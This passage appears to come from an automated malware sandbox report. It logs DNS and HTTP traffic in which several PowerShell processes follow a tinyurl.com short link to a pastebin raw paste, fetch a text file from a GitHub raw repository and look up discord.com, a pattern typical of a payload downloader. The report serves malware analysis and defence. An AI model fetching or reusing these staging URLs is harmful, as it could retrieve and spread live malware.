                                                                Oct 15, 2024 16:00:11.119957924 CEST53637011.1.1.1192.168.2.7
                                                                Oct 15, 2024 16:00:12.232745886 CEST5428153192.168.2.71.1.1.1
                                                                Oct 15, 2024 16:00:12.239821911 CEST53542811.1.1.1192.168.2.7
                                                                Oct 15, 2024 16:00:25.339085102 CEST53515721.1.1.1192.168.2.7
                                                                Oct 15, 2024 16:00:27.865967989 CEST6267653192.168.2.71.1.1.1
                                                                Oct 15, 2024 16:00:27.873362064 CEST53626761.1.1.1192.168.2.7
                                                                Oct 15, 2024 16:00:39.578011990 CEST6205553192.168.2.71.1.1.1
                                                                Oct 15, 2024 16:00:39.585885048 CEST53620551.1.1.1192.168.2.7

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 15, 2024 16:00:00.424312115 CEST192.168.2.71.1.1.10x3338Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:01.957214117 CEST192.168.2.71.1.1.10x46faStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:10.416733027 CEST192.168.2.71.1.1.10x2d74Standard query (0)tinyurl.comA (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:11.112942934 CEST192.168.2.71.1.1.10x3422Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:12.232745886 CEST192.168.2.71.1.1.10x2be1Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:27.865967989 CEST192.168.2.71.1.1.10xb30Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:39.578011990 CEST192.168.2.71.1.1.10xe5f3Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 15, 2024 16:00:00.432708025 CEST1.1.1.1192.168.2.70x3338No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                Oct 15, 2024 16:00:01.258724928 CEST1.1.1.1192.168.2.70x4530No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Oct 15, 2024 16:00:01.258724928 CEST1.1.1.1192.168.2.70x4530No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:02.200792074 CEST1.1.1.1192.168.2.70x46faNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                Oct 15, 2024 16:00:10.424205065 CEST1.1.1.1192.168.2.70x2d74No error (0)tinyurl.com104.18.111.161A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:10.424205065 CEST1.1.1.1192.168.2.70x2d74No error (0)tinyurl.com104.17.112.233A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:11.119957924 CEST1.1.1.1192.168.2.70x3422No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:11.119957924 CEST1.1.1.1192.168.2.70x3422No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:11.119957924 CEST1.1.1.1192.168.2.70x3422No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:12.239821911 CEST1.1.1.1192.168.2.70x2be1No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:12.239821911 CEST1.1.1.1192.168.2.70x2be1No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:12.239821911 CEST1.1.1.1192.168.2.70x2be1No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:12.239821911 CEST1.1.1.1192.168.2.70x2be1No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:27.873362064 CEST1.1.1.1192.168.2.70xb30No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:27.873362064 CEST1.1.1.1192.168.2.70xb30No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:27.873362064 CEST1.1.1.1192.168.2.70xb30No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:27.873362064 CEST1.1.1.1192.168.2.70xb30No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:27.873362064 CEST1.1.1.1192.168.2.70xb30No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:39.585885048 CEST1.1.1.1192.168.2.70xe5f3No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:39.585885048 CEST1.1.1.1192.168.2.70xe5f3No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 16:00:39.585885048 CEST1.1.1.1192.168.2.70xe5f3No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • pastebin.com
                                                                • raw.githubusercontent.com
                                                                • discord.com
                                                                • tinyurl.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.749744104.18.111.161806448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:10.479126930 CEST164OUTGET /yeykydun HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: tinyurl.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:11.103497982 CEST1236INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 15 Oct 2024 14:00:11 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                Referrer-Policy: unsafe-url
                                                                X-Robots-Tag: noindex
                                                                X-TinyURL-Redirect-Type: redirect
                                                                Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                                X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                CF-Cache-Status: HIT
                                                                Age: 406
                                                                Set-Cookie: __cf_bm=7hoX_E8_iPnMl1MRR4c5e1JNiP7qXA3CNP6ag8nUpUE-1729000811-1.0.1.1-hSng.tpzjiNYJy8Vcd79KXhFBTyhxddTFNiQTAgKXf4c7Mnwpfq9c.XZrw6T9ybkjFR7z2mw4Up1r6.jGNXxYQ; path=/; expires=Tue, 15-Oct-24 14:30:11 GMT; domain=.tinyurl.com; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8d30557cee886b17-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
                                                                Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
                                                                Oct 15, 2024 16:00:11.103718042 CEST256INData Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
                                                                Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.749743104.18.111.161807352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:10.481404066 CEST164OUTGET /yeykydun HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: tinyurl.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:11.113112926 CEST1236INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 15 Oct 2024 14:00:11 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                Referrer-Policy: unsafe-url
                                                                X-Robots-Tag: noindex
                                                                X-TinyURL-Redirect-Type: redirect
                                                                Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                                X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                CF-Cache-Status: HIT
                                                                Age: 406
                                                                Set-Cookie: __cf_bm=fWzWzmRoLK_XuppO0Ee3iOrkgJ6su945hqM2_hqHGck-1729000811-1.0.1.1-6IZmwajNURh5mByFdnBHAfqeqL409ZmMXBgB1NwVtBW9dGzjDNowrG_AQQePhxOTGD9Jr8Yn97YV8WoiIgRCnQ; path=/; expires=Tue, 15-Oct-24 14:30:11 GMT; domain=.tinyurl.com; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8d30557cda4a6b49-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
                                                                Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
                                                                Oct 15, 2024 16:00:11.113164902 CEST251INData Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
                                                                Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><
                                                                Oct 15, 2024 16:00:11.113174915 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.749745104.18.111.161807180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:10.496746063 CEST164OUTGET /yeykydun HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: tinyurl.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:11.132302999 CEST1236INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 15 Oct 2024 14:00:11 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                Referrer-Policy: unsafe-url
                                                                X-Robots-Tag: noindex
                                                                X-TinyURL-Redirect-Type: redirect
                                                                Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                                X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                CF-Cache-Status: HIT
                                                                Age: 406
                                                                Set-Cookie: __cf_bm=hL_BO4LGQrW63kHAwiCUlH4rsb_idB48vduEtXFPH5U-1729000811-1.0.1.1-OShRh3kekPzLOkTIQX4s5NsIJia9jDfMJt0FfFcadyPr0PSH_YYVd3kH5TgVdbv.d0_oorcwp2hOwhRQBxTG6A; path=/; expires=Tue, 15-Oct-24 14:30:11 GMT; domain=.tinyurl.com; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8d30557d0d83e5b9-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
                                                                Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
                                                                Oct 15, 2024 16:00:11.132322073 CEST256INData Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
                                                                Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.749746104.18.111.161807172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:10.515091896 CEST164OUTGET /yeykydun HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: tinyurl.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:11.166562080 CEST1236INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 15 Oct 2024 14:00:11 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                Referrer-Policy: unsafe-url
                                                                X-Robots-Tag: noindex
                                                                X-TinyURL-Redirect-Type: redirect
                                                                Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                                X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                CF-Cache-Status: HIT
                                                                Age: 406
                                                                Set-Cookie: __cf_bm=JsRRUJZw7yCehNAtLMXnpzlJCTpaH1HIlM3VjobB1Rc-1729000811-1.0.1.1-lv6ebRYZN3H4MT_C3yOcQyoigjHEDTjuWDjcl0VeiaaPgNUQoj2TyTe9U7cfYqQaKjMxV0dz8uTSGMyWrgGIiw; path=/; expires=Tue, 15-Oct-24 14:30:11 GMT; domain=.tinyurl.com; HttpOnly
                                                                Server: cloudflare
                                                                CF-RAY: 8d30557d3eba46cb-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
                                                                Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
                                                                Oct 15, 2024 16:00:11.166600943 CEST251INData Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
                                                                Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><
                                                                Oct 15, 2024 16:00:11.166610956 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.749760185.199.109.133807180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:12.245913982 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:12.865664005 CEST541INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                Content-Length: 0
                                                                Server: Varnish
                                                                Retry-After: 0
                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:12 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120139-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729000813.798404,VS0,VE0
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Expires: Tue, 15 Oct 2024 14:05:12 GMT
                                                                Vary: Authorization,Accept-Encoding


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.749759185.199.109.133807172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:12.246109962 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:12.871643066 CEST541INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                Content-Length: 0
                                                                Server: Varnish
                                                                Retry-After: 0
                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:12 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210176-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729000813.807264,VS0,VE0
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Expires: Tue, 15 Oct 2024 14:05:12 GMT
                                                                Vary: Authorization,Accept-Encoding


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.749761185.199.109.133806448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:12.246268034 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:12.871684074 CEST541INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                Content-Length: 0
                                                                Server: Varnish
                                                                Retry-After: 0
                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:12 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120134-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729000813.807537,VS0,VE0
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Expires: Tue, 15 Oct 2024 14:05:12 GMT
                                                                Vary: Authorization,Accept-Encoding


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.749762185.199.109.133807352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:12.246316910 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:12.861293077 CEST541INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                Content-Length: 0
                                                                Server: Varnish
                                                                Retry-After: 0
                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:12 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210128-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729000813.797048,VS0,VE0
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Expires: Tue, 15 Oct 2024 14:05:12 GMT
                                                                Vary: Authorization,Accept-Encoding


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.752112104.20.3.235805844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:39.598272085 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:40.208422899 CEST472INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 15 Oct 2024 14:00:40 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=3600
                                                                Expires: Tue, 15 Oct 2024 15:00:40 GMT
                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                Server: cloudflare
                                                                CF-RAY: 8d305632da4f474e-DFW
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.752120185.199.109.133805844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 16:00:41.185332060 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 16:00:41.791990995 CEST541INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                Content-Length: 0
                                                                Server: Varnish
                                                                Retry-After: 0
                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:41 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120086-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729000842.728637,VS0,VE0
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Expires: Tue, 15 Oct 2024 14:05:41 GMT
                                                                Vary: Authorization,Accept-Encoding


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.752153104.20.3.235804240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
